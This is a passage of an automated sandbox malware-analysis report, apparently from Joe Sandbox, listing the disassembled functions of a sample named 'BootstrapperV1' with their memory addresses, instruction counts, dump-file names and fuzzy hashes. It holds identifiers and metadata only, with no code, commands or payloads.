                                                                                                                                                        • Instruction Fuzzy Hash: 48C16761E1DBCBCFF7909B6994596B63FE1EF9B250B0841BAE44DC7192CD18D80AC381
                                                                                                                                                        Function 00007FFAAC596CD0 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 34999b64436bed5d7c1156e20937965fe84bea0cbc6650b763ad07df57363363
                                                                                                                                                        • Instruction ID: 7eb208232e9bc46f30fb6554c6b7d4391feeab4df6b461457aedf6ead27d1053
                                                                                                                                                        • Opcode Fuzzy Hash: 34999b64436bed5d7c1156e20937965fe84bea0cbc6650b763ad07df57363363
                                                                                                                                                        • Instruction Fuzzy Hash: 13C10930A1DB4A8FEB94EB2888555B97BE5FF56350B0041BEF44EC3292DE28EC4587C1
                                                                                                                                                        Function 00007FFAAC59454D Relevance: .4, Instructions: 404COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4bfddea47ef5b16b0ef08ad6e632b8955b400043578b8593e0a676ef1d524c2c
                                                                                                                                                        • Instruction ID: fc0f63d796f995380f06b1a8709d9d909f80fb2e8bf5867c54037b52b8dde9b5
                                                                                                                                                        • Opcode Fuzzy Hash: 4bfddea47ef5b16b0ef08ad6e632b8955b400043578b8593e0a676ef1d524c2c
                                                                                                                                                        • Instruction Fuzzy Hash: 43C14932B0E65A8FE715AB6DA8441F97794EF86721B0482B7E14DCB193DE19DC4A83C0
                                                                                                                                                        Function 00007FFAAC59BD19 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 419804b614cfe9097513011a94b2e3a7f7413c1862e4c71a64686cb5891457a3
                                                                                                                                                        • Instruction ID: 08847167ba6ba2ffd4109289eed04e3ce26a0fc7efc0c322daebcefef1fa24d2
                                                                                                                                                        • Opcode Fuzzy Hash: 419804b614cfe9097513011a94b2e3a7f7413c1862e4c71a64686cb5891457a3
                                                                                                                                                        • Instruction Fuzzy Hash: A1A18D22A4DA4F4FFBA8E75CA8556B47BD5EF56360B0446FAE00DC3192DD1EE84643C0
                                                                                                                                                        Function 00007FFAAC59D35F Relevance: .4, Instructions: 363COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 44618343df6d2c6d07ddc960fc487e6cddc9c508c6154cb429a70af8c7e81793
                                                                                                                                                        • Instruction ID: e09ac46c80e4c2a618c8991ef7d257c95e17a4bb0c9f74668149db3023c98016
                                                                                                                                                        • Opcode Fuzzy Hash: 44618343df6d2c6d07ddc960fc487e6cddc9c508c6154cb429a70af8c7e81793
                                                                                                                                                        • Instruction Fuzzy Hash: 55B1A470A59A4A8FFB98EB28C454AB477D1EF55300F0481F9E40ECB297DD29EC498BD1
                                                                                                                                                        Function 00007FFAAC5A273A Relevance: .4, Instructions: 360COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4f89eed909f8899f170d4ef282cb44f1f5c083d3249f1d8f912e7af42761f7e5
                                                                                                                                                        • Instruction ID: 8db3d7d03b6fd4933860e4b7f34c8bb38ee8c87c53eabeb9385c15ef2bbfe345
                                                                                                                                                        • Opcode Fuzzy Hash: 4f89eed909f8899f170d4ef282cb44f1f5c083d3249f1d8f912e7af42761f7e5
                                                                                                                                                        • Instruction Fuzzy Hash: A3B17C62A1D74B8FF745E72C98AA5E53BD4EF56B10B0042B7F04DCB1A3DD18A84A83C5
                                                                                                                                                        Function 00007FFAAC596DB8 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f426f8ed6b42958bcb6af84d4a44e886f0934b1b845bb913763b5f8888cca96d
                                                                                                                                                        • Instruction ID: 45efecb0316bcb15be03020e6104a7151a6cb0baac67496551ecb12b0847eaf5
                                                                                                                                                        • Opcode Fuzzy Hash: f426f8ed6b42958bcb6af84d4a44e886f0934b1b845bb913763b5f8888cca96d
                                                                                                                                                        • Instruction Fuzzy Hash: FDB17C22A4EB83CFF359A76C685A1B47F91EF56621B0481BBE08DC7197DC19D80987C2
                                                                                                                                                        Function 00007FFAAC596D10 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 14417595091d408490e5bd1b590a64eee2b80e1374d335c6a2ea7644307e6478
                                                                                                                                                        • Instruction ID: 599efabbec2b0a7ee890bd2410e126a8b640c89e2da7dc8c26b3ec40a090816b
                                                                                                                                                        • Opcode Fuzzy Hash: 14417595091d408490e5bd1b590a64eee2b80e1374d335c6a2ea7644307e6478
                                                                                                                                                        • Instruction Fuzzy Hash: 1FA1E731A1CB4D8FEB58DB5CA85A6B877D1EF9A710F04017EE44EC3291DA26F84587C2
                                                                                                                                                        Function 00007FFAAC59CA60 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 777a9322902e7f7e332db2dbce96b1133f220a3907a234d6b0a659d80a7d855d
                                                                                                                                                        • Instruction ID: 916efb6567ec78f5ed160b507d42173adc38ec77aab6d8bc7d5925a870fc5b5a
                                                                                                                                                        • Opcode Fuzzy Hash: 777a9322902e7f7e332db2dbce96b1133f220a3907a234d6b0a659d80a7d855d
                                                                                                                                                        • Instruction Fuzzy Hash: B481282175D90A4FF694E72CA8597B977C2EB9A360B0541FAE40EC7292DD0EEC464381
                                                                                                                                                        Function 00007FFAAC59B4C4 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c219f588f5dc50f58849f6a4ffa88a977e928cc76894819b63ea73108ee6f634
                                                                                                                                                        • Instruction ID: 6dfa9a3514ba8195a51e3a9769dba6f0dc671bc4aae573599733ddfc28428a4c
                                                                                                                                                        • Opcode Fuzzy Hash: c219f588f5dc50f58849f6a4ffa88a977e928cc76894819b63ea73108ee6f634
                                                                                                                                                        • Instruction Fuzzy Hash: 2A911630A18B4A8FF768DB2CD48557677D4FB56310B148ABDE08EC3192EE29F84687C0
                                                                                                                                                        Function 00007FFAAC59F5FA Relevance: .3, Instructions: 310COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ec818fa965e11df57df9d3a6aebc65ad6aaf3ae2b44c0391a19aa7ab6066bf78
                                                                                                                                                        • Instruction ID: f90d59f21dba7678c047fa38c5e4ac7773c7200387c51e91ee8dd615dcadd4fa
                                                                                                                                                        • Opcode Fuzzy Hash: ec818fa965e11df57df9d3a6aebc65ad6aaf3ae2b44c0391a19aa7ab6066bf78
                                                                                                                                                        • Instruction Fuzzy Hash: A1213A7291DF868FE750E76888196A5B7D5FB95310F0446BAE08DC71A1DA2CD84983C3
                                                                                                                                                        Function 00007FFAAC5AB784 Relevance: .3, Instructions: 305COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: bea613ac5521002685582e3b8547e3d63865efc45155ac44e7569ccc9dfc39dc
                                                                                                                                                        • Instruction ID: 8f03bd0321405f97ad805be1b992b070a0f308042eea79cc79c8ef2b54fbdf60
                                                                                                                                                        • Opcode Fuzzy Hash: bea613ac5521002685582e3b8547e3d63865efc45155ac44e7569ccc9dfc39dc
                                                                                                                                                        • Instruction Fuzzy Hash: 67913231A58B4A8FE758DF2C94895B177E0FF56710B90867EE08EC3292DE24F84687C1
                                                                                                                                                        Function 00007FFAAC590B7A Relevance: .3, Instructions: 289COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6a4937e43b0f964154d619fc1efcf61c9d5c15cd40058ea35a298c0eab3f624f
                                                                                                                                                        • Instruction ID: 773eb7a9a9a4d51a41cd04fa89fdd9752de113e7bb73caecd1cd8a95f67ff4a8
                                                                                                                                                        • Opcode Fuzzy Hash: 6a4937e43b0f964154d619fc1efcf61c9d5c15cd40058ea35a298c0eab3f624f
                                                                                                                                                        • Instruction Fuzzy Hash: 2EA1B330A5A64A8FE795EBA4C4516EDB7E1EF86310F1484FDD04DC72A2CE2E9C86C750
                                                                                                                                                        Function 00007FFAAC5ABAC5 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2377127e9d24d750a041100c1833de3ee319deeaa83940b4b8674d2dbb95d0c8
                                                                                                                                                        • Instruction ID: 93563fb987ae3f882451656544b93551a7a98d338c27627f4345b71fdbbcb196
                                                                                                                                                        • Opcode Fuzzy Hash: 2377127e9d24d750a041100c1833de3ee319deeaa83940b4b8674d2dbb95d0c8
                                                                                                                                                        • Instruction Fuzzy Hash: 8481393150EA4B8FE3598B299859A707BE4EF56310B4842BDE08DC71A7DD29F846C7C1
                                                                                                                                                        Function 00007FFAAC59595D Relevance: .3, Instructions: 282COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f69c3bd7d0087c1ddf724343a741bd037013986cb6e1233a0772fcc1a418939a
                                                                                                                                                        • Instruction ID: 80c1a4870f2e96c8f7672c0414f2bd672f683bc5f5778c0917fcf0e060cdcb44
                                                                                                                                                        • Opcode Fuzzy Hash: f69c3bd7d0087c1ddf724343a741bd037013986cb6e1233a0772fcc1a418939a
                                                                                                                                                        • Instruction Fuzzy Hash: 6181486191DB87CFFB94E7A888057B5B7E1FB56310F0446B9E04EC7092DE2DE8468382
                                                                                                                                                        Function 00007FFAAC599430 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d6efb0f9b6aa81bbf5cdac185268bb73ccdc08b5754b16f940d0d85e736aa4d0
                                                                                                                                                        • Instruction ID: eb6566def0341c027d4f8e78725f2dce2a189b420d188c919a06d95fda136eea
                                                                                                                                                        • Opcode Fuzzy Hash: d6efb0f9b6aa81bbf5cdac185268bb73ccdc08b5754b16f940d0d85e736aa4d0
                                                                                                                                                        • Instruction Fuzzy Hash: F371263065DB4A8FF728DB28D4814B577E4EB56310B108ABEE48FC3192DE29F8468781
                                                                                                                                                        Function 00007FFAAC5AB28C Relevance: .2, Instructions: 233COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dc5b33e558a5f80a7157bed03adbb0346c9ff2ed8985cf0ef60df21fce5a510e
                                                                                                                                                        • Instruction ID: efa982ca8be1fe9227928b78ba876c5d8a84f2a5029b40eede5925ebce7da04f
                                                                                                                                                        • Opcode Fuzzy Hash: dc5b33e558a5f80a7157bed03adbb0346c9ff2ed8985cf0ef60df21fce5a510e
                                                                                                                                                        • Instruction Fuzzy Hash: 4761363090EA8A8FF799DB2988587657BE5EF96700F4441FAE04DC7193DD28EC0A83D1
                                                                                                                                                        Function 00007FFAAC598F25 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 16b4979070eb66fb3092dea148bcd21b770cb3b2a5c9a107f49aa7af6b61aeff
                                                                                                                                                        • Instruction ID: 2e2bfc3a94a43a47c66e34a01370e981f5727dbad768a120090a19ef0b45971d
                                                                                                                                                        • Opcode Fuzzy Hash: 16b4979070eb66fb3092dea148bcd21b770cb3b2a5c9a107f49aa7af6b61aeff
                                                                                                                                                        • Instruction Fuzzy Hash: 7D51A03174DE0B8FEAE8EB1C9494A7073D6EF5932075845FAE40EC72A6DD1ADC458381
                                                                                                                                                        Function 00007FFAAC5947C8 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2c2202cb8a44873bceea4488c93f2357d1159239cfa86fd6a4cddc963f5591a7
                                                                                                                                                        • Instruction ID: 831c19615fbaab78bace118231f4ceb252ff26a8c052bb3f590fe54e2db64200
                                                                                                                                                        • Opcode Fuzzy Hash: 2c2202cb8a44873bceea4488c93f2357d1159239cfa86fd6a4cddc963f5591a7
                                                                                                                                                        • Instruction Fuzzy Hash: EE610730619B468FE758DB28C4895B5B7D5EF96700F10857EE04EC72A2DE29F84A87C1
                                                                                                                                                        Function 00007FFAAC5A9008 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 760fb641385220b99aec8993a7c4627d0e33f32bed427466e1c09e7e6bd9b5c0
                                                                                                                                                        • Instruction ID: 22262f9942a02b7ef7004a4e7de23e4ad2b991769a65c4cabf7557ea1e89f04f
                                                                                                                                                        • Opcode Fuzzy Hash: 760fb641385220b99aec8993a7c4627d0e33f32bed427466e1c09e7e6bd9b5c0
                                                                                                                                                        • Instruction Fuzzy Hash: 82612221A4EBC68FE356973C58193A4BFE5EF56250F0481FFD08DC7193D929D94A8382
                                                                                                                                                        Function 00007FFAAC599440 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dd5731fe5313b4e5c8cba0853f7c199b00a7003a6d4cc37cc855561ebfd33182
                                                                                                                                                        • Instruction ID: 63d255e8c0bb10e7e818bc239ee66b151c0486de3534b495d5a8ad7048addf84
                                                                                                                                                        • Opcode Fuzzy Hash: dd5731fe5313b4e5c8cba0853f7c199b00a7003a6d4cc37cc855561ebfd33182
                                                                                                                                                        • Instruction Fuzzy Hash: 26511730659A0B8FF7689B1CD884671B3E4FF56310B144AB9E44EC3256D92EF8478781
                                                                                                                                                        Function 00007FFAAC597D48 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 610b45dd0e4e2738ac8b62eec217a6c6d13c4366f1af43985408e3e5f1a6fa21
                                                                                                                                                        • Instruction ID: c5dbb656362fd9c044f6cc812a5ace5c6486e0498a00eff09e26afc81f8c6542
                                                                                                                                                        • Opcode Fuzzy Hash: 610b45dd0e4e2738ac8b62eec217a6c6d13c4366f1af43985408e3e5f1a6fa21
                                                                                                                                                        • Instruction Fuzzy Hash: 76515A22E0EA8BCFF394A76C845D2767BD1EF5A660B0441FAE04DC71A2DD188C0A83C1
                                                                                                                                                        Function 00007FFAAC5AF5F2 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4aabcfa3b42cd438c4ac080615f44095d2faa0ebab3cb97f27a4e019e420473b
                                                                                                                                                        • Instruction ID: 596e84463d8f53537745d0193e8d23020bff476acf3472ef903fe63e1b9fffad
                                                                                                                                                        • Opcode Fuzzy Hash: 4aabcfa3b42cd438c4ac080615f44095d2faa0ebab3cb97f27a4e019e420473b
                                                                                                                                                        • Instruction Fuzzy Hash: 9E51E763A8E52287E21177FEFC195FC7744CF86775B14C237E18EC51A38C19644A82D5
                                                                                                                                                        Function 00007FFAAC5A1D91 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 11973ea8128225696e2a80a454ba884cf0aa939f40d894307dc184a616611298
                                                                                                                                                        • Instruction ID: bbe6e63516b7f15758028c2b4ebac60af59fcb93f4d35f347fef10f3de95a656
                                                                                                                                                        • Opcode Fuzzy Hash: 11973ea8128225696e2a80a454ba884cf0aa939f40d894307dc184a616611298
                                                                                                                                                        • Instruction Fuzzy Hash: 9151E721B0D94A8FEB94EB2DC848A763BD5EF9A710B1441B9E44EC7297DD24EC46C3C0
                                                                                                                                                        Function 00007FFAAC5A28E8 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: abd8c7b617abcae06e69ac1c483818453b4603e837461586f497c2d2e1bf0c50
                                                                                                                                                        • Instruction ID: d420965f82d202e0e1691b91856b8cccb6039450589c9f23c4cba9388a15b9b1
                                                                                                                                                        • Opcode Fuzzy Hash: abd8c7b617abcae06e69ac1c483818453b4603e837461586f497c2d2e1bf0c50
                                                                                                                                                        • Instruction Fuzzy Hash: 2A51E820B1CA598FEB54EB2D94596B93BD1EF69750F0041BBF44EC3297CD28E84583C6
                                                                                                                                                        Function 00007FFAAC596738 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ac6a565c3a6b1a5bb224b2954dbcf7213ed7b9b6ec13f7fc9759176f11f88b7b
                                                                                                                                                        • Instruction ID: 2ff7a111d9c9b01d495d92fa1a29d31bc3121987b9a900240a29e67cf3c7a352
                                                                                                                                                        • Opcode Fuzzy Hash: ac6a565c3a6b1a5bb224b2954dbcf7213ed7b9b6ec13f7fc9759176f11f88b7b
                                                                                                                                                        • Instruction Fuzzy Hash: 44513966A5D68FDFF781A7A888255E87BE0EF06310F0441FAE05DC7193DD1D580E8752
                                                                                                                                                        Function 00007FFAAC5AF98A Relevance: .2, Instructions: 192COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9cb35e0553b0b0507e39d48a00599e9bac2c89d2f2c8c7df2e94b0338108c139
                                                                                                                                                        • Instruction ID: 128e8e75fda66abe3a9e87d0a95dff74c79b9faa7ea43cd767c371be52a044e1
                                                                                                                                                        • Opcode Fuzzy Hash: 9cb35e0553b0b0507e39d48a00599e9bac2c89d2f2c8c7df2e94b0338108c139
                                                                                                                                                        • Instruction Fuzzy Hash: 8251487170DB8A8FEB55DB6C98596757BD1EF9A700B0441BEE44DC72A2DE21EC038381
                                                                                                                                                        Function 00007FFAAC5AAFFA Relevance: .2, Instructions: 178COMMON
                                                                                                                                                        Download Yara Rule
